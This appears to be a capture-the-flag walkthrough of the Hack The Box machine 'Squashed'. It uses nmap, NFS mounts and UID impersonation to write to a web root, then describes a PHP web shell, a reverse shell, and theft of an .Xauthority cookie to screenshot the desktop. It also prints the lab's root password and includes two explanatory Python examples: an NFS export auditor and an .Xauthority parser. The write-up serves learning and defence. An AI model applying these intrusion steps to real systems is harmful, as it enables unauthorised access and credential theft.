2023年6月21日 22:43:44
Nmap
┌──(root💀kali)-[/home/kali/hacktheboxtools]
└─# nmap -sCV 10.10.11.191
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-21 11:05 EDT
Stats: 0:00:32 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.82% done; ETC: 11:06 (0:00:00 remaining)
Nmap scan report for 10.10.11.191
Host is up (0.90s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
| 256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_ 256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Built Better
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 39773/tcp mountd
| 100005 1,2,3 41561/udp mountd
| 100005 1,2,3 46976/udp6 mountd
| 100005 1,2,3 49217/tcp6 mountd
| 100021 1,3,4 39445/tcp6 nlockmgr
| 100021 1,3,4 41743/tcp nlockmgr
| 100021 1,3,4 49344/udp6 nlockmgr
| 100021 1,3,4 52702/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
2049/tcp open nfs_acl 3 (RPC #100227)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.30 seconds
80
Nothing to exploit here; it is a purely static page.
2049–NFS
Refer:https://book.hacktricks.xyz/network-services-pentesting/nfs-service-pentesting
In short, NFS (v3 with the default AUTH_SYS flavour, as here) has no authentication of its own: the server trusts whatever uid/gid the client puts in the RPC call. The only limits are the export's squash options (root_squash, on by default, maps client uid 0 to nobody; all_squash maps everyone). So a file owned by uid N on the export is readable or writable by any client that can mount it and run as uid N locally.
MSF scan module (auxiliary/scanner/nfs/nfsmount lists the exports; showmount -e 10.10.11.191 gives the same list from the shell)
Mounting with mount
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine]
└─# cd Squashed
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/Squashed]
└─# ls
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/Squashed]
└─# mkdir ross
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/Squashed]
└─# mkdir html
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/Squashed]
└─# ls
html ross
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/Squashed]
└─# mount -t nfs 10.10.11.191:/home/ross ./ross -o nolock
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/Squashed]
└─# ls
html ross
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/Squashed]
└─# ls -al
total 16
drwxr-xr-x 4 root root 4096 Jun 21 11:17 .
drwxr-xr-x 33 root root 4096 Jun 21 11:17 ..
drwxr-xr-x 2 root root 4096 Jun 21 11:17 html
drwxr-xr-x 14 cjl cjl 4096 Jun 21 01:23 ross
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/Squashed]
└─# cd ross
┌──(root💀kali)-[/home/…/hacktheboxtools/machine/Squashed/ross]
└─# ls -al
total 68
drwxr-xr-x 14 cjl cjl 4096 Jun 21 01:23 .
drwxr-xr-x 4 root root 4096 Jun 21 11:17 ..
lrwxrwxrwx 1 root root 9 Oct 20 2022 .bash_history -> /dev/null
drwx------ 11 cjl cjl 4096 Oct 21 2022 .cache
drwx------ 12 cjl cjl 4096 Oct 21 2022 .config
drwxr-xr-x 2 cjl cjl 4096 Oct 21 2022 Desktop
drwxr-xr-x 2 cjl cjl 4096 Oct 21 2022 Documents
drwxr-xr-x 2 cjl cjl 4096 Oct 21 2022 Downloads
drwx------ 3 cjl cjl 4096 Oct 21 2022 .gnupg
drwx------ 3 cjl cjl 4096 Oct 21 2022 .local
drwxr-xr-x 2 cjl cjl 4096 Oct 21 2022 Music
drwxr-xr-x 2 cjl cjl 4096 Oct 21 2022 Pictures
drwxr-xr-x 2 cjl cjl 4096 Oct 21 2022 Public
drwxr-xr-x 2 cjl cjl 4096 Oct 21 2022 Templates
drwxr-xr-x 2 cjl cjl 4096 Oct 21 2022 Videos
lrwxrwxrwx 1 root root 9 Oct 21 2022 .viminfo -> /dev/null
-rw------- 1 cjl cjl 57 Jun 21 01:23 .Xauthority
-rw------- 1 cjl cjl 2475 Jun 21 01:23 .xsession-errors
-rw------- 1 cjl cjl 2475 Dec 27 10:33 .xsession-errors.old
┌──(root💀kali)-[/home/…/hacktheboxtools/machine/Squashed/ross]
└─# cd ..
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/Squashed]
└─# ls
html ross
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/Squashed]
└─# mount -t nfs 10.10.11.191:/var/www/html ./html -o nolock
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/Squashed]
└─#
After mounting we can read the target's
- /var/www/html
- /home/ross
Inside /home/ross everything is owned by uid 1001 (ls shows the owner as cjl only because a local Kali account happens to have that UID; ls -ln shows the raw number).
When I renamed the uid 1001 user in /etc/passwd to someb0dy and remounted, the files showed up as owned by someb0dy. The name is purely local cosmetics; the NFS server only ever sees the numeric uid the client sends.
.Xauthority
We found this file in the top level of /home/ross; it is used later.
Before matching the UID, reading it only gave permission denied (it is mode 0600, and our root is squashed to nobody on the server side).
/var/www/html
After mounting, the html directory is owned by uid 2017.
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/Squashed]
└─# usermod someb0dy --help
Usage: usermod [options] LOGIN
Options:
-a, --append append the user to the supplemental GROUPS
mentioned by the -G option without removing
the user from other groups
-b, --badname allow bad names
-c, --comment COMMENT new value of the GECOS field
-d, --home HOME_DIR new home directory for the user account
-e, --expiredate EXPIRE_DATE set account expiration date to EXPIRE_DATE
-f, --inactive INACTIVE set password inactive after expiration
to INACTIVE
-g, --gid GROUP force use GROUP as new primary group
-G, --groups GROUPS new list of supplementary GROUPS
-h, --help display this help message and exit
-l, --login NEW_LOGIN new value of the login name
-L, --lock lock the user account
-m, --move-home move contents of the home directory to the
new location (use only with -d)
-o, --non-unique allow using duplicate (non-unique) UID
-p, --password PASSWORD use encrypted password for the new password
-P, --prefix PREFIX_DIR prefix directory where are located the /etc/* files
-r, --remove remove the user from only the supplemental GROUPS
mentioned by the -G option without removing
the user from other groups
-R, --root CHROOT_DIR directory to chroot into
-s, --shell SHELL new login shell for the user account
-u, --uid UID new UID for the user account
-U, --unlock unlock the user account
-v, --add-subuids FIRST-LAST add range of subordinate uids
-V, --del-subuids FIRST-LAST remove range of subordinate uids
-w, --add-subgids FIRST-LAST add range of subordinate gids
-W, --del-subgids FIRST-LAST remove range of subordinate gids
-Z, --selinux-user SEUSER new SELinux user mapping for the user account
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/Squashed]
└─# usermod someb0dy -u 2017
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/Squashed]
└─# su someb0dy
kali% idd
zsh: command not found: idd
kali% id
uid=2017(someb0dy) gid=1001(someb0dy) groups=1001(someb0dy)
kali%
Once we are uid 2017 we have full write access to the web root and can drop files. .htaccess shows that PHP is handled there, so we upload a PHP one-liner web shell.
With command execution, we launch a reverse shell.
That gives us the user shell.
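To make the UID/GID point concrete, here is an added example (not code from the box or its author) that models how a Linux NFS server treats the AUTH_SYS credentials a client sends, and audits exports(5) options for the settings that make the trick possible. The /etc/exports lines inside it are constructed to resemble this box; the real exports on 10.10.11.191 are not shown in this write-up, and the paths /srv/backup and /srv/public, the client network, and the file modes are assumptions. It shows why root on Kali could not read the 0600 .Xauthority (uid 0 is squashed to nobody) while a local user given uid 2017 could write to /var/www/html.

```python
"""NFSv3 AUTH_SYS credential model and exports(5) audit.

Added example for this write-up, not code from the box or its author.
The export lines are constructed (the real /etc/exports on 10.10.11.191
is not shown); the option keywords are the real exportfs(8) ones.
"""
import re
from collections import namedtuple

NOBODY = 65534  # Linux NFS server default anonuid/anongid

# Constructed sample (assumption): one client spec per line.
SAMPLE_EXPORTS = """\
/var/www/html   *(rw,sync,root_squash)
/home/ross      *(ro,sync,root_squash)
/srv/backup     10.10.14.0/24(rw,no_root_squash)
/srv/public     *(ro,all_squash,anonuid=65534,anongid=65534)
"""

EXPORT_RE = re.compile(r"^(\S+)\s+(\S*)\((.*)\)$")
Export = namedtuple("Export", "path client options")  # options: flag->True, key->value


def parse_exports(text):
    """Parse exports(5) lines (comments allowed) into Export tuples."""
    exports = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        m = EXPORT_RE.match(line)
        if not m:
            raise ValueError(f"unparsed export line: {line!r}")
        path, client, opts = m.groups()
        options = {}
        for opt in filter(None, opts.split(",")):
            key, _, val = opt.partition("=")
            options[key.strip()] = val.strip() if val else True
        exports.append(Export(path, client or "*", options))
    return exports


def effective_ids(export, uid, gid):
    """uid/gid the server acts with after squashing the client's AUTH_SYS creds.

    AUTH_SYS carries no proof of identity: the server believes the numbers
    the client sends, subject only to the squash options of the export.
    """
    opts = export.options
    anonuid = int(opts.get("anonuid", NOBODY))
    anongid = int(opts.get("anongid", NOBODY))
    if "all_squash" in opts:
        return anonuid, anongid
    if "no_root_squash" not in opts:  # root_squash is the default
        uid = anonuid if uid == 0 else uid
        gid = anongid if gid == 0 else gid
    return uid, gid


def can_access(export, uid, gid, file_uid, file_gid, mode, want):
    """Owner/group/other check applied after squashing; want is "r" or "w"."""
    if want == "w" and "rw" not in export.options:  # ro export blocks writes
        return False
    euid, egid = effective_ids(export, uid, gid)
    bit = {"r": 4, "w": 2}[want]
    if euid == file_uid:
        return bool((mode >> 6) & bit)
    if egid == file_gid:
        return bool((mode >> 3) & bit)
    return bool(mode & bit)


def audit(exports):
    """Flag options that let an arbitrary client choose its own identity."""
    findings = []
    for e in exports:
        if e.client == "*":
            findings.append((e.path, "exported to every host"))
        if "no_root_squash" in e.options:
            findings.append((e.path, "no_root_squash: client root is server root"))
        sec = str(e.options.get("sec", "sys"))
        if "all_squash" not in e.options and not sec.startswith("krb5"):
            findings.append((e.path, "AUTH_SYS: any client-chosen uid/gid is honoured"))
    return findings


if __name__ == "__main__":
    exports = parse_exports(SAMPLE_EXPORTS)
    html, ross = exports[0], exports[1]
    # root on Kali is squashed to nobody: no write to the 2017-owned web root,
    # no read of the 0600 .Xauthority owned by uid 1001
    print("root writes html:", can_access(html, 0, 0, 2017, 2017, 0o755, "w"))
    print("root reads .Xauthority:", can_access(ross, 0, 0, 1001, 1001, 0o600, "r"))
    # a local account created with uid 2017 / 1001 is indistinguishable from the real one
    print("uid 2017 writes html:", can_access(html, 2017, 2017, 2017, 2017, 0o755, "w"))
    print("uid 1001 reads .Xauthority:", can_access(ross, 1001, 1001, 1001, 1001, 0o600, "r"))
    for path, msg in audit(exports):
        print(f"{path}: {msg}")
```

Run it directly to print the four access decisions and the audit findings. The defensive takeaway is in audit(): an export without all_squash or sec=krb5* is trusting whatever uid the client chooses, so on a real server prefer Kerberos (sec=krb5p) or all_squash with a dedicated anonuid, and never export to *.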
root
Refer:https://book.hacktricks.xyz/network-services-pentesting/6000-pentesting-x11#screenshots-capturing
Uploading .Xauthority
We can take .Xauthority straight from the NFS mount.
Upload it to /home/alex on the target.
Testing the authorisation
With the auth file sitting in /home/alex, running xdpyinfo -display :0 to check that the cookie is accepted (and dump the server's info) failed.
HOME turns out to be empty in this shell.
The fix is export HOME=/home/alex, i.e. set the HOME variable so the library finds $HOME/.Xauthority. Xlib looks at $XAUTHORITY first and only falls back to $HOME/.Xauthority, so export XAUTHORITY=/home/alex/.Xauthority works just as well and does not depend on HOME at all.
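The .Xauthority file is just a list of cookie records, so once it is in hand you can either drop the whole file in place (as above) or pull the cookie out and load it with xauth. The following parser/encoder is an added example, not code from the box or its author; the sample record it builds is constructed, and the hostname squashed.htb and the cookie bytes are made up (a 12-character hostname does give the 57-byte size seen in the listing, consistent with a single local record for display :0, but that is an inference, not something the page shows).

```python
"""Parser and encoder for the .Xauthority file format.

Added example for this write-up, not code from the box or its author.
Each record is a big-endian u16 address family followed by four
u16-length-prefixed fields: address, display number, auth name, auth
data (the cookie). The sample record is constructed: the hostname
squashed.htb and the cookie bytes are made up.
"""
import struct

FAMILIES = {0: "FamilyInternet", 6: "FamilyInternet6",
            254: "FamilyWild", 256: "FamilyLocal"}


def _take(buf, off):
    """Read one u16-length-prefixed field at off; return (bytes, new_off)."""
    if off + 2 > len(buf):
        raise ValueError("truncated length")
    (n,) = struct.unpack_from(">H", buf, off)
    off += 2
    if off + n > len(buf):
        raise ValueError("truncated field")
    return buf[off:off + n], off + n


def _address(family, raw):
    """FamilyInternet stores the raw IPv4 bytes; everything else is text."""
    if family == 0 and len(raw) == 4:
        return ".".join(str(b) for b in raw)
    return raw.decode("latin-1")


def parse_xauthority(buf):
    """Return one dict per record, cookie as hex; raise on truncated input."""
    entries, off = [], 0
    while off < len(buf):
        if off + 2 > len(buf):
            raise ValueError("truncated family")
        (family,) = struct.unpack_from(">H", buf, off)
        off += 2
        address, off = _take(buf, off)
        number, off = _take(buf, off)
        name, off = _take(buf, off)
        data, off = _take(buf, off)
        entries.append({
            "family": family,
            "family_name": FAMILIES.get(family, f"family{family}"),
            "address": _address(family, address),
            "number": number.decode("ascii"),
            "name": name.decode("ascii"),
            "cookie": data.hex(),
        })
    return entries


def build_record(family, address, number, name, data):
    """Inverse of the parser: serialise one record from raw byte fields."""
    out = struct.pack(">H", family)
    for field in (address, number, name, data):
        out += struct.pack(">H", len(field)) + field
    return out


def xauth_add_commands(entries):
    """`xauth add` lines equivalent to the parsed records."""
    cmds = []
    for e in entries:
        sep = "/unix:" if e["family"] == 256 else ":"  # FamilyLocal uses host/unix:N
        cmds.append(f"xauth add {e['address']}{sep}{e['number']} {e['name']} {e['cookie']}")
    return cmds


# Constructed sample: one FamilyLocal record for display :0. A 12-byte
# hostname gives 57 bytes, the size of the .Xauthority in the listing.
SAMPLE = build_record(256, b"squashed.htb", b"0", b"MIT-MAGIC-COOKIE-1",
                      bytes.fromhex("00112233445566778899aabbccddeeff"))

if __name__ == "__main__":
    for e in parse_xauthority(SAMPLE):
        print(e["family_name"], e["address"], e["number"], e["name"], e["cookie"])
    print("\n".join(xauth_add_commands(parse_xauthority(SAMPLE))))
```

xauth_add_commands() emits the xauth add line for each record; running it on the target with XAUTHORITY pointing at a writable file reproduces the same authorisation without copying Ross's file byte for byte. The parser raises on truncated input rather than silently returning a partial cookie.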
Capturing a screenshot
Refer: https://book.hacktricks.xyz/network-services-pentesting/6000-pentesting-x11#screenshots-capturing
Downloading the file: screenshot.xwd
The capture (an xwd dump of display :0, taken with xwd as shown on the hacktricks page above) lands on the target, so how do we get it back?
Via the web directory: bingo, just move the file into the web root we already write to and fetch it over HTTP.
Via nc: piping it to a listener on our own Kali box works just as well.
Then convert screen.xwd screen.png (ImageMagick) turns it into a viewable image.
The screenshot contains the root password:
| username | password |
|---|---|
| root | cah$mei7rai9A |
Summary
This box taught me a new attack surface: port 2049, NFS. It lets us mount the exports locally (mind the UID/GID: the server trusts the client's numbers, so matching the file owner's uid locally is the whole trick) and build on that. The privilege escalation part, abusing the .Xauthority cookie to screenshot the X session, was also fun: the admin had the root password displayed on the desktop.